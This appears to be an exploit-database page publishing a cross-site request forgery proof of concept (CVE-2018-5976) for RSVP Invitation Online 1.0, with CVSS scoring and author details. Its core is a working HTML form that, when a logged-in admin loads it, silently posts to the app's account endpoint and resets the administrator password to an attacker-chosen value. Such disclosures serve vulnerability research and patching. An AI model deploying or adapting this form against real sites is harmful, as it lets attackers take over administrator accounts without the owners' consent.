RSVP Invitation Online 1.0 Cross-Site Request Forgery (Update Admin)

2018.01.24
Credit: Ihsan Sencan
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-352


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

<!-- # # # # # # Exploit Title: RSVP Invitation Online 1.0 - Cross-Site Request Forgery (Update Admin Pass) # Dork: N/A # Date: 23.01.2018 # Vendor Homepage: http://putrazendrato.link/ # Software Link: https://www.codegrape.com/item/rsvp-invitation-online/3890 # Demo: http://putrazendrato.link/rsvp/login.php # Version: 1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: CVE-2018-5976 # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # # Proof of Concept: # 1) --> <html> <body> <form method="post" action="http://localhost/rsvp/function/account.php"> <!--Change admin pass--> <input name="newpassword" type="text" value="efe"> <!--Change admin pass confirm--> <input name="confirm" type="text" value="efe"> <input type="submit" name="Submit" value="Update"> </form> </body> </html>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top